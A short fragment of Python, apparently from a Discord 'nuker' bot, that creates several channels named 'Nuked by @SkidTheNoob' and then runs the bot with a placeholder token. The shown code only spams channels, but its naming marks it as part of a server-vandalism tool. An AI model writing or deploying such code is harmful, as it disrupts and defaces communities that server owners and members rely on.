    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
    await guild.create_text_channel('Nuked by @SkidTheNoob')
 
 

bot.run ("TOKEN")
